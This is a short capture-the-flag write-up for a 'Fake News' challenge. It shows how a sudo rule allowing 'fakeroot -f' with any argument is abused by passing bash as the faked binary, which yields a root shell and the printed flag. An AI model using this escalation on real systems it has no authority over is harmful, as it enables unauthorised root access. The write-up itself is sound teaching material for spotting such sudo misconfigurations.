1.8 KiB
title, excerpt, tags
| title | excerpt | tags | ||
|---|---|---|---|---|
| CTF20K 2025: Fake News | Using misconfigured Linux system utilities to escalate privilege. |
|
We are provided with an user SSH login. Once on the server, we can explore a bit and we quickly find something interesting:
user@65fbb9aee61c7005bfc08c5e2dec9231:~$ sudo -l
Matching Defaults entries for user on 65fbb9aee61c7005bfc08c5e2dec9231:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User user may run the following commands on
65fbb9aee61c7005bfc08c5e2dec9231:
(ALL) NOPASSWD: /usr/bin/fakeroot -f *
The sudo command here allows us to see what commands we can run with superuser privileges. We see that the usr/bin/fakeroot -f command can be ran this way, with anything as the argument.
Fakeroot is a tool that makes the environment look like it has root privileges for file manipulation: this is particularly useful to create archives with files in them having root ownership, without actually having it. By looking at the manual page for this command, we see this:
--faked binary
Specify an alternative binary to use as faked.
Here, -f is shorthand for this --faked option.
The faked that the manual refers to can be set to anything, therefore we could try setting it as something useful like bash:
user@65fbb9aee61c7005bfc08c5e2dec9231:~$ sudo /usr/bin/fakeroot -f bash
root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# id
root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# ls
Here we see that there is no output at all, for any of our commands.. but if we try to escape that shell with a simple ^D, we can access the real root shell:
root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user#
exit
root@65fbb9aee61c7005bfc08c5e2dec9231:/home/user# cat /root/flag.txt
RM{Omg_Fakeroot_is_Fak3???}